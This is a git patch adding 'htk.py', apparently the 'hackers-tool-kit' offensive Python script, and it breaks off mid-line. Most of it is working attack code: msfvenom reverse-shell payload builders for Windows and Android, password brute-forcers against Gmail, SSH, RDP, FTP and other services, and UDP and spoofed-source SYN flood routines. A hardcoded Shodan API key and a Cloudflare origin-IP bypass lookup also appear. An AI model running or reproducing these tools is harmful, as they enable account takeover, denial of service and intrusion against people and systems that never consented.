if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - found = True -mainbanner() -main() From de6ed3d3af82ebc64ccf501ea1d97e4f43ed2dbd Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 24 Mar 2019 14:57:11 -0400 Subject: [PATCH 057/214] Add files via upload --- htk.py | 2054 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2054 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..88d29d6 --- /dev/null +++ b/htk.py @@ -0,0 +1,2054 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arppois : ARP poisoning | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + os.system("iwconfig") + os.system("neofetch") + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + show = 'macchanger -s {0}'.format(k) + os.system(show) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to 